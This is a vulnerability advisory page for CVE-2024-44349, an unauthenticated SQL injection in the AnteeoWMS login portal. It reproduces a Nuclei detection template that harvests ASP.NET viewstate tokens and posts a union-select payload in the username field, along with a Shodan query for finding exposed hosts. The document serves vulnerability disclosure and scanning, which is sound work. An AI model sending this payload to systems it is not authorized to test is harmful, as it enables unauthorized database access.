CVE-2024-44349: AnteeoWMS < v4.7.34 - SQL Injection

日期: 2025-08-01 | 影响软件: AnteeoWMS | POC: 已公开

漏洞描述

A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.

PoC代码[已公开]

id: CVE-2024-44349

info:
  name: AnteeoWMS < v4.7.34 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.
  reference:
    - https://blog.cybergon.com/posts/cve-2024-44349/
    - http://nvd.nist.gov/vuln/detail/CVE-2024-44349
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-44349
    cwe-id: CWE-89
    epss-score: 0.77309
    epss-percentile: 0.98939
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"ANTEEO"
  tags: cve,cve2024,sqli,anteeowms

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /default.aspx HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: viewstate
        internal: true
        group: 1
        regex:
          - 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"'

      - type: regex
        part: body
        name: viewstategen
        internal: true
        group: 1
        regex:
          - 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"'

      - type: regex
        part: body
        name: eventval
        internal: true
        group: 1
        regex:
          - 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"'

  - raw:
      - |
        POST /default.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Conversion failed when converting the nvarchar value &#39;Microsoft SQL Server'
# digest: 4a0a004730450221009552b32c8f2a2474a330a19c9f722beae680b27ca54a90b79edd69cef39422a4022052d297d33ad0fb9d1dcbcde8f4992b2349b186ed420a8067f1adf5f6a8f706ea:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-44349.yaml